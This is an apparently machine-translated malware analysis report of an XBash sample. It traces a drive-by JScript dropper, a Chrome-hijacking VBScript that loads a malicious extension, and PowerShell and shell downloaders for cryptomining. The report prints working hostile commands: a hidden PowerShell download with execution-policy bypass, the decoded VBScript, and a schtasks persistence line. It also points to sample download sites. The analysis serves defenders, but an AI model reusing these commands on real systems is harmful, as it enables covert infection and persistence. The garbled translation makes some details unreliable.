Shulou(Shulou.com)06/01 Report--

  virus samples download from a cq5f7a075d author's theme post "XBash Series virus sample Analysis report", is an Iron Group organization to use XBash malware, sample link: https://bbs.ichunqiu.com/thread-47475-1-1.html, recommend several more active sample download areas, such as Kafan, I Chunqiu, my love, VirusShare and so on are more active.

✃

The ✎ story still starts with the website of hanging Horse, that is, the web page downloads malicious code, as shown below:

  Picture 1: JScript script

The variable ebc9 is dragged into 010 and converted into a string as follows:

  Picture 2: array restore

The restore Js code is shown below, and the restore code (marked red) is shown in the picture:

  Picture 3: code recovery

✍, like the code above, does the following:

   1. Use the ActiveX control. Note that this is only supported by IE, because it belongs to Microsoft.

   2. Get the temporary path of temp and concatenate the IE browser process name (camouflage).

   3. Determine whether the temporary file exists, and execute the powershell instruction if it does not exist, as follows:

Powershell.exe-executionpolicy bypass-noprofile-windowstyle hidden (new-object system.net.webclient) .downloadfile ('downloadfile' means that the remote download script bypasses the execution policy and hides the execution window, and the execution of powershell instructions is generally not blocked by antivirus software, thus achieving the goal of downloading malicious code and pretending to be explorer.exe.

   4. Execute the downloaded malicious code.

✃

After the analysis of the website about hanging horses by ✎, the following is the malicious code downloaded, as shown below:

  picture 4: shelling

As shown above, a UPX shell is added to the sample. After removing the repair IAT, the sample is restored, as shown below after being pulled into the IDA:

  Picture 5: main function

The sub_405920 analysis is as follows. First, the identity value of the window shell special folder is obtained, as shown below:

  Picture 6: SHGetSpecialFoladerPathA

Continue the analysis, then initialize a string, and calculate the string size, the flow chart is as follows:

  Picture Seven: string

In fact,   initially statically observed and guessed the wrong order of initialized strings, and then dynamically debugged to verify the accuracy of the data. In order to verify the accuracy of the data, the following function flow is called. The name is obtained according to string initialization, and the lock mechanism is set as follows:

  Picture 8: execution process

The name is obtained according to the string operation, and the stitching path is as follows:

  Picture 9: C:\ Program Files\ TempBMBD19XS

It's not really open here, it's just a warm-up, and the following sample is getting serious, as shown below:

  Picture 10: static Analysis

As shown in the figure above,   acquires the running path and splices the chrome.crx. When a path appears, it will take action, as shown below:

  Picture 11: chrome.crx

  continues to analyze the function sub_408360 and selects the dynamic debugging string. Because the string is encrypted, dynamic debugging is relatively easy to analyze. The internal code is as follows:

  Picture 12: sub_408360

When   parses the function sub_40D0B0, it guesses part of the code according to the loop law (unfortunately wrong) when assembling and analyzing. Take a look at the string decryption in OD. When you see the CreateToolhelp32Snapshot function, you will understand that this is to create a snapshot of the process, as well as the meaning of the whole function, as shown below:

  Picture 13: sub_40D0B0.CreateToolhelp32Snapshot

Traverse the process and kill the chrome process, as shown below:

  Picture 14: Kill chrome.exe

  as shown in the figure above, after this layer of relationship, according to the current analysis, the chrome.exe (chrome.crx) sample must be prepared to continue linear analysis under this camouflage, as shown in figure 12:

  1. Open the registry SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ App Paths\ chrome.exe and request Path.

  2. If the splicing path C:\ Programiles\ Google\ Chrome\ Application\ chrome.exe is successful

Next, create a file under the path to write the data, as follows:

  Picture 15: _ mkdir and write

Unpack the data, wrap up the work, and use the schtasks plan to start the release program, as follows:

  Picture 16: WinExec

  sub_408360 gloriously fulfilled his mission, killed the chrome.exe process, and created a file that released malicious code and called WinExec to execute the release.

✃

After   has done these things, it is not over yet. When we reach the watershed, it is interesting to judge the command line parameters of the running sample. The analysis is as follows:

  Photo 17: watershed

If it is not equal, it jumps, and if it is equal, the execution process is shown in the following figure:

  Picture 18: success

This article focuses on the analysis of non-jump situations (there is no jump in the real machine environment), as follows:

  Picture 19: create and write malicious code

  if you are familiar with decompressing the chrome.crx assembly above, you will find that the routine is the same:

   1. Get the file name and splice the file path.

   2. Process of creating and writing malicious code.

   3. Then it's time to execute malicious code.

Let's compare whether the data written is the same or not to verify the correctness of the function, as shown below:

  Picture 20: write malicious data

The process of requesting rundll32.exe to execute DllUnInstall and then creating malicious code is as follows:

  Picture 21: execute malicious dll

  then called ExitProcess to end his life, and the virus downloaded from the horse website did two things:

   1. Sec.vbe is running

   2. Run xxx.dat (name is random dll file)

✃

Therefore, the goal of   is very clear. The two programs that are run are analyzed in turn, and the order of runtime is sometimes deliberately arranged. Next, analyze sec.vbe:

If you look at the suffix, you can see that this is a virus written in VB. Open it first and see what it looks like, as shown in the following figure:

  Picture 22: encrypt sec.vb

According to the style,   should be encrypted by Microsoft's ScriptEncode coding algorithm, so try it first. Just change it. The code after decryption is as follows:

In vb, the comment is in single quotation marks'On Error ReSume Next: 'this vb code is exception handling, and will continue to run when an error occurs. Uninterrupted strComputer = ".": Set OBjWMISeRvice = GETobject ("winmgmts:\\" & StrComPuter& "\ root\ CIMV2"): 'set is used to assign values to object variables and returns the ActiveX object Set CoLiTems = ObjWmISErvice.ExeCquery ("SELECT * FROM Win32_Process where name='chrome.exe'", 48):' ExeCquery means to close the specified user process SeT objShell = CreateObjeCt ("WScript.Shell"): 'create WScript. The sehll object starT = False:' is traversed and compared with keywords FOr Each ObjITem in colItEms: iF INstr (objitem.CommandLiNe Variables in "silent-launch") > 1'vb are case-insensitive strings thEn start = true: end if: NEXt:' closing process function Killproc (strProcname): On ErroR REsume Next: Set objWMIService = GetObject ("winmgmts: {impersonationLevel=impersonate}!\.\ root\ cimv2"): Set arRProcesses = objWmIServiCe.ExEcQuery ("select * from win32_process where Name ='" & strprocname& "'): for Each Proccess In ARrpRocessEs: proccess.Terminate 0: 'terminate refers to the termination of the event Next:ENd FuncTiOn:If nOT start then KillprOc ("chrome.exe"):' kill the process Dim Instpath: 'allocate memory space to the variable according to the variable type INstpaTh = objShell.Regread ("HKLM\ Software\ Microsoft\ Windows\ CurrentVersion\ App Paths\ chrome.exe\ Path"):' read note Book table appdataLocAtIon = objShell.ExpandENvironmenTStriNgs ("% LOCALAPPDATA%"): 'get path C:\ Users\ xxx\ AppData\ Local chrome_locatIon = AppDataLoCaTion+ "\ chrome":' splicing path C:\ Users\ xxx\ AppData\ Local\ chrome objShell.eXec (InsTPaTh+ "\ chrome.exe-- load-extension=" + chrome_locatIon+ "--silent-launch-- enable-automation"):' -- every time load-extension restarts chrome, the shortcut will be replaced by C:\ Users\ xxx\ AppData\ Local\ chrome'--silent-launch means that chrome is not enabled Silent installation'--enable-automation turns on automatic End if

How to decrypt it? decrypt https://www.jb51.net/tools/onlinetools/jiemi/jsendecode.htm online

The above vb script analysis, for the key data to write detailed comments, here is not one by one wordy, sec.vbe closed chrome, and then replaced the Chrome shortcut.

  as for .dat is a dll file, PEID inspection found refueling vmp virtual shell, for this shell, with shell debugging, after virtual, anti-debugging can be dynamic debugging. Here interested friends self-analysis, limited ability can not be a good analysis of the steps of the virus, so this is a more critical link to skip.

What was done through the dll execution (that is, the .dll file omitted above)?

   1. Released a piece of executable malicious code under windows, including the powershell instruction (used to download mining)

   2, Linux released the .sh script (for process killing and downloading mining)

In fact, the release of two downloaders, let's analyze the release of the downloader.

✃

The Powershell under Windows is as follows:

Pre-knowledge:

  1,-EncodedCommand accepts the base-64 encoded string version of the command. Use this parameter to submit to Windows PowerShell commands that require complex quotation marks or curly braces. In the code-E

  2,-WindowStyle sets the window style to Normal, Minimized, Maximized, or Hidden. Code-W

  3,-noprofile abbreviation-NoP, does not load the windows poweshell configuration file

  4,-NonInteractive does not display interactive prompts to the user. 、

  opens the .ps1 script and finds that it is encrypted, as shown below:

  Picture 23: encrypted Powershell instruction

  based on the parameter of-E, we can infer that Base64 is used for overall encryption. After the following online Base64 decryption, the following image is shown:

  Picture 24: Base64 decryption

After the first Base64 decryption of  , although there are still a large number of characters unrecognized, some key data, such as iex, are exposed, which provides an idea for subsequent decryption. The IEX keyword is included in the script, and we remove and redirect it to the new file to try to decrypt it. The decrypted data is shown as follows:

  Picture 25: Base64 decryption

Analyze the Function DllMiner function as follows:

  Picture 26: Function DllMiner  

The content of the   function downloads the data and intercepts the correct malicious code to write to the file, name it tmp.jpg, execute the downloaded file, and then write the DllMiner function to the tmp.ps1, as follows:

  Picture 27: tmp.ps1

SchTasks.exe is called to perform the scheduled task, as shown below:

SchTasks.exe / Create / SC MINUTE / TN "Update" / TR "PowerShell.exe-ExecutionPolicy bypass-windowstyle hidden-noexit-File $env:TMP\ tmp.ps1" / MO 6 / Parameter introduction: 1. / Create create a new scheduled task. 2. / TN taskname specifies the name that uniquely identifies the scheduled task 3, / ST starttime specifies the start time of the running task / SC MINUTE (one minute) 4, / TR taskrun specifies the path of the program running at this scheduled time 5, / MO modifier improves the plan type to allow better control of the schedule repetitive summary: run tmp.ps1, that is, the Function DllMiner function, once a minute

In fact, the download is the mining program, for the mining program analysis is not in place, interested can be analyzed.

Add:

  1. Can't the computer run powershell scripts? If an error is reported, let the policy be modified, and the modified configuration is shown in the following figure:

  Picture 28: powershell Policy configuration

Introduction to   2 and Powershell about IEX obfuscation and decryption: https://www.codercto.com/a/24286.html

✃ 

The .sh under Linux is as follows:

Take a look at how the .sh script runs under Linux, as follows:

  Pictures 29

An endless loop, two functions, is the content of the entire script, the kills function is as follows:

  Picture 30

All kinds of kill and pkill to terminate the mining process of other programs. Then start executing the downloadyam function, as shown below:

  Pictures 21

The above red marks are comments, which is the process of script execution. Xx.sh downloads a total of five files:

   config.json,bashf,pools.txt,bashg,XbashY

  to the analysis of the two downloaders, as for the analysis of mining procedures, or do not show ugliness. After we have time to study and study, we will make up for the unanalyzed part.

to be continued!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.